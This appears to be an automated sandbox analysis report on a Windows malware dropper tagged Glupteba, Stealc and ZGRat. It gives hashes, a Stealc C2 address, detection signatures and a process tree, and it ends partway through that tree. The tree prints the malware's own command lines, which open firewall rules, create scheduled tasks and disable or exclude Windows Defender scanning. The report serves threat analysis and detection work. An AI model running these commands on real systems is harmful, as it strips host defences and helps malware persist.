glupteba | a0e3a64e0e6aee3370ccbbca59f8ae0b34be674963c1dabe14926b24fdcae7d0

Analysis

max time kernel
21s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-05-2024 17:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Isetup2.exe
Size

2.7MB
MD5

731ff38afbc5a664f5a458e222d91f84
SHA1

5105f89898a3d9e5b5b52ddcd7d0a3b167aaf701
SHA256

a0e3a64e0e6aee3370ccbbca59f8ae0b34be674963c1dabe14926b24fdcae7d0
SHA512

910b1c9fb8e28c3f24d35a875ff86f3ab2e2c573797e078ece204538a3bdc6d42bc92531197e57be577ffb2e4cacdd53fec6a61843e6c69be4794e68506f68c3
SSDEEP

24576:3RoBHi3buy4toE1jC6Ayo2xhWLbSPlqRvc68XzRVGvxB5VA0UC1dUUKj/OZ8j3g3:BoKmo4jC6TovDRUC1doj/Tg3

Score

10^/10

glupteba stealc zgrat dropper evasion execution loader rat stealer

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/912-552-0x0000000000CA0000-0x00000000044D4000-memory.dmp	family_zgrat_v1
behavioral1/memory/912-562-0x000000001EF40000-0x000000001F04A000-memory.dmp	family_zgrat_v1
behavioral1/memory/912-573-0x0000000000A60000-0x0000000000A84000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 17 IoCs

resource	yara_rule
behavioral1/memory/2136-362-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/972-364-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/2136-415-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/1828-416-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/972-418-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/2820-419-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/972-501-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/2136-507-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/1828-516-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/2820-515-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/1052-556-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/3060-570-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/1052-574-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/556-576-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/2204-572-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/1052-583-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral1/memory/556-584-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2440	powershell.exe
2220	powershell.exe
2788	powershell.EXE
1060	powershell.EXE
2180	powershell.EXE
1704	powershell.exe
2812	powershell.exe
2084	powershell.exe
1744	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2456	netsh.exe
1272	netsh.exe
2760	netsh.exe
2416	netsh.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Yv5vcSoIaPTJj1BsAL0eMAx.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CQLIFSbcuJsrbeeouFNgyLIX.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dI9lJgzmKwouwD9q0yQzJcSW.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mik6v0QXDH2lI1nVJRvhofUS.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4m4Ag0M8OcbfaF1mN3mdh34Z.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xs0lNRWBpS2uMMufaYkpDhbr.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZO9BfPqHWmRGiTL2c4MZfjxd.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8KAvNTksXRmfTqWgvInsUVaz.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp0RcT05i1LrP3q8zLFX4cSC.bat	regsvcs.exe

Executes dropped EXE 7 IoCs

pid	Process
2640	1SWPaBQ0RIuiyfcJZWWyLMJ6.exe
2136	P8qB66NJciwkee84pVHsWxNh.exe
972	r3N2Bj4fKvN4Bysl8299fvVV.exe
1828	n5fQ6muCrQpYmpmFgNBmiAus.exe
2820	RYGWMUfmnR4JVojgw8rbv3V9.exe
2864	PcGMzXA67ABarM1hhm9ElHGd.exe
2304	Install.exe

Loads dropped DLL 17 IoCs

pid	Process
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2680	regsvcs.exe
2864	PcGMzXA67ABarM1hhm9ElHGd.exe
2864	PcGMzXA67ABarM1hhm9ElHGd.exe
2864	PcGMzXA67ABarM1hhm9ElHGd.exe
2864	PcGMzXA67ABarM1hhm9ElHGd.exe
2304	Install.exe
2304	Install.exe
2304	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
5	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1368 set thread context of 2680	1368	Isetup2.exe	29

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3040	schtasks.exe
1492	schtasks.exe
2704	schtasks.exe
1448	schtasks.exe
2456	schtasks.exe
1012	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	regsvcs.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 1368 wrote to memory of 2680	1368	Isetup2.exe	29
PID 2680 wrote to memory of 2640	2680	regsvcs.exe	30
PID 2680 wrote to memory of 2640	2680	regsvcs.exe	30
PID 2680 wrote to memory of 2640	2680	regsvcs.exe	30
PID 2680 wrote to memory of 2640	2680	regsvcs.exe	30
PID 2680 wrote to memory of 2136	2680	regsvcs.exe	31
PID 2680 wrote to memory of 2136	2680	regsvcs.exe	31
PID 2680 wrote to memory of 2136	2680	regsvcs.exe	31
PID 2680 wrote to memory of 2136	2680	regsvcs.exe	31
PID 2680 wrote to memory of 1828	2680	regsvcs.exe	32
PID 2680 wrote to memory of 1828	2680	regsvcs.exe	32
PID 2680 wrote to memory of 1828	2680	regsvcs.exe	32
PID 2680 wrote to memory of 1828	2680	regsvcs.exe	32
PID 2680 wrote to memory of 972	2680	regsvcs.exe	33
PID 2680 wrote to memory of 972	2680	regsvcs.exe	33
PID 2680 wrote to memory of 972	2680	regsvcs.exe	33
PID 2680 wrote to memory of 972	2680	regsvcs.exe	33
PID 2680 wrote to memory of 2820	2680	regsvcs.exe	34
PID 2680 wrote to memory of 2820	2680	regsvcs.exe	34
PID 2680 wrote to memory of 2820	2680	regsvcs.exe	34
PID 2680 wrote to memory of 2820	2680	regsvcs.exe	34
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2680 wrote to memory of 2864	2680	regsvcs.exe	35
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36
PID 2864 wrote to memory of 2304	2864	PcGMzXA67ABarM1hhm9ElHGd.exe	36

C:\Users\Admin\AppData\Local\Temp\Isetup2.exe
"C:\Users\Admin\AppData\Local\Temp\Isetup2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Users\Admin\Pictures\1SWPaBQ0RIuiyfcJZWWyLMJ6.exe
    "C:\Users\Admin\Pictures\1SWPaBQ0RIuiyfcJZWWyLMJ6.exe"
    3⤵
    - Executes dropped EXE
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\u21c.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u21c.0.exe"
      4⤵
      PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\u21c.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u21c.1.exe"
      4⤵
      PID:2252
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        
        PID:912
- - C:\Users\Admin\Pictures\P8qB66NJciwkee84pVHsWxNh.exe
    "C:\Users\Admin\Pictures\P8qB66NJciwkee84pVHsWxNh.exe"
    3⤵
    - Executes dropped EXE
    PID:2136
  - - C:\Users\Admin\Pictures\P8qB66NJciwkee84pVHsWxNh.exe
      "C:\Users\Admin\Pictures\P8qB66NJciwkee84pVHsWxNh.exe"
      4⤵
      PID:3060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1500
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1272
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:1492
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1448
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1964
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        
        PID:2308
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:1444
- - C:\Users\Admin\Pictures\n5fQ6muCrQpYmpmFgNBmiAus.exe
    "C:\Users\Admin\Pictures\n5fQ6muCrQpYmpmFgNBmiAus.exe"
    3⤵
    - Executes dropped EXE
    PID:1828
  - - C:\Users\Admin\Pictures\n5fQ6muCrQpYmpmFgNBmiAus.exe
      "C:\Users\Admin\Pictures\n5fQ6muCrQpYmpmFgNBmiAus.exe"
      4⤵
      PID:556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2964
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2456
- - C:\Users\Admin\Pictures\r3N2Bj4fKvN4Bysl8299fvVV.exe
    "C:\Users\Admin\Pictures\r3N2Bj4fKvN4Bysl8299fvVV.exe"
    3⤵
    - Executes dropped EXE
    PID:972
  - - C:\Users\Admin\Pictures\r3N2Bj4fKvN4Bysl8299fvVV.exe
      "C:\Users\Admin\Pictures\r3N2Bj4fKvN4Bysl8299fvVV.exe"
      4⤵
      PID:1052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2956
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2760
- - C:\Users\Admin\Pictures\RYGWMUfmnR4JVojgw8rbv3V9.exe
    "C:\Users\Admin\Pictures\RYGWMUfmnR4JVojgw8rbv3V9.exe"
    3⤵
    - Executes dropped EXE
    PID:2820
  - - C:\Users\Admin\Pictures\RYGWMUfmnR4JVojgw8rbv3V9.exe
      "C:\Users\Admin\Pictures\RYGWMUfmnR4JVojgw8rbv3V9.exe"
      4⤵
      PID:2204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:880
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2416
- - C:\Users\Admin\Pictures\PcGMzXA67ABarM1hhm9ElHGd.exe
    "C:\Users\Admin\Pictures\PcGMzXA67ABarM1hhm9ElHGd.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\7zSCA22.tmp\Install.exe
      .\Install.exe /tEdidDDf "385118" /S
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:1336
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:2836
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:2392
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:1492
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:1012
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:2376
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:1304
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:1660
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2456
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:292
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:1884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1704
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:2140
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2952
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2084
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:2408
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\zOnZFMw.exe\" it /xaIdidnyBR 385118 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:3040
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:1972
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:1536
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:1908
- - C:\Users\Admin\Pictures\DS7pd8nsE0RgGfl8lj5HxbIx.exe
    "C:\Users\Admin\Pictures\DS7pd8nsE0RgGfl8lj5HxbIx.exe"
    3⤵
    PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\7zSD92F.tmp\Install.exe
      .\Install.exe /tEdidDDf "385118" /S
      4⤵
      PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:2396
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:636
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:840
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:572
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:1016
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:1672
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:616
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:1920
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:2008
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:1912
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:1976
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2228
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1744
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2788
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2812
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:1512
    - - C:\Windows\SysWOW64\schtasks.exe
        
